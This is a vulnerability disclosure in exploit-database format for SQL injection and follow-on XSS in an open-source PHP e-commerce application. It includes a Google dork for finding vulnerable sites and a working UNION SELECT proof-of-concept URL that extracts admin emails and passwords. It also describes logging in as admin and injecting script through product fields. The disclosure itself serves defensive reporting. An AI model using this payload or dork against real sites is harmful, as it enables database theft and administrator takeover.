**************************************************************************************** #Exploit Title: Ecommerce-PHP-kurniaramadhan-1.0- Sql Injection #Title of the Vulnerability: SQL Injection to XSS #Product Name: E-Commerce-PHP #Vendor: https://github.com/kurniaramadhan/ #Vulnerable Product Link: https://github.com/kurniaramadhan/E-Commerce-PHP #Date: 2024-12-23 #Exploit Author: Maloy Roy Orko #Google Dork: "Powered by kurniaramadhan" #Category:Webapps #Tested On: Android,Mac, Firefox ## Reference: https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html https://portswigger.net/web-security/sql-injection ###Affected Components: Parameters,Admin Panel Create Product Fields. #Description: SQL Injection in "parameters" in "E-commerce PHP application By kurniaramadhan v 1.0" allows "remote" attacker "to dump database,gain admin access and leads to XSS as create product fields aren't protected" via "all parameters and create product fields". ###Proof of Concept: ### Demo : http://192.168.1.100:8080/blog-details.php?blog_id=1+union+select+concat(admin_email,0x3a,0x3c62723e3c62723e3c2f623e41646d696e2050617373776f72643a3c2f623e,0x3c62723e,admin_password),2,3,4,5,6,7,8,9+from+admins--+ ###Attack Vectors: To exploit vulnerability,he has to input exploits via parameters and then he can dump whole database or gain admin credentials and then he can login admin and as create products fields are not protected ,here XSS can be exploited then. ###Detailed Blog About The Poc: https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html ********************************************************* #Discovered by: Maloy Roy Orko #Website: https://www.websecurityinsights.my.id/ ****************************************************************************************